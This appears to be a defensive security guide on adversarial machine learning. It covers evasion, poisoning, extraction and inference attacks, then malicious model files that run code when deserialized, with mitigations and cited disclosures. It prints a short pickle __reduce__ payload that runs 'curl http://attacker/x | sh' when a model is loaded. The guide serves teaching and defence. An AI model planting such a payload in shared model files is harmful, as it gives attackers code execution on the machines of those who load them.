Adversarial machine learning
A decade of work that still governs any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infra attacks later. Five families, each with a worked example.
| Family | Target / asset | Canonical example |
|---|---|---|
| Evasion | Inference-time decision | FGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry) |
| Poisoning / backdoor | Training/fine-tune data | BadNets trigger: model behaves until it sees the attacker’s cue (Gu) |
| Extraction | Model IP via API | Rebuild a functional copy from query/response pairs (Tramèr) |
| Membership inference | Training-set privacy | Was this record used to train? (Shokri) |
| Model inversion | Training-data reconstruction | Recover representative faces from a recognition model (Fredrikson) |
# A tiny perturbation in the direction that most increases the model's loss# flips the prediction while looking unchanged to a human.perturbation = epsilon * sign( gradient_of_loss_wrt_input ) # epsilon ~ a few /255adversarial_image = original_image + perturbation# model(original_image) -> "stop sign" (0.98)# model(adversarial_image) -> "speed limit" (0.91) visually identical# DEFENSE: adversarial training (train on such examples), input# transformation/randomization, and report robustness under PGD, not just FGSM.That single idea - move along the gradient of the loss - underlies the whole family; stronger attacks (PGD) just iterate it, and transfer means an attacker can craft it on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).
Canon
- Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
- Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
- Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
- Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security
▸ For the organization
- Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
- If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
- Rate-limit and monitor prediction APIs against extraction.
Model files are executable: serialization & deserialization attacks
A trained model ships as a file, and the common formats are not inert data - they run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib), plus TensorFlow/Keras Lambda layers, TorchScript, and HDF5, all permit executable callbacks during deserialization. Loading an attacker’s model file is therefore arbitrary code execution on the machine that loads it - a supply-chain RCE that needs no exploit, just model.load(). The pickle RCE primitive has been known since 2011; what changed is that model-sharing hubs turned it into a distribution channel.
# pickle calls __reduce__ on load to reconstruct an object; an attacker# returns a callable + args, and the "reconstruction" runs their code.class Payload: def __reduce__(self): import os return (os.system, ("curl http://attacker/x | sh",)) # runs on torch.load()# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);# PyTorch weights_only=True is the default since v2.6; scan in CI before promotion.This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.
Defenses for the model artifact
- Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
- Use restricted loaders - PyTorch’s weights-only unpickler (
weights_only=True) is the default from v2.6, refusing arbitrary callables on load. - Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
- Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).
Sources
- ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
- JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
- PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format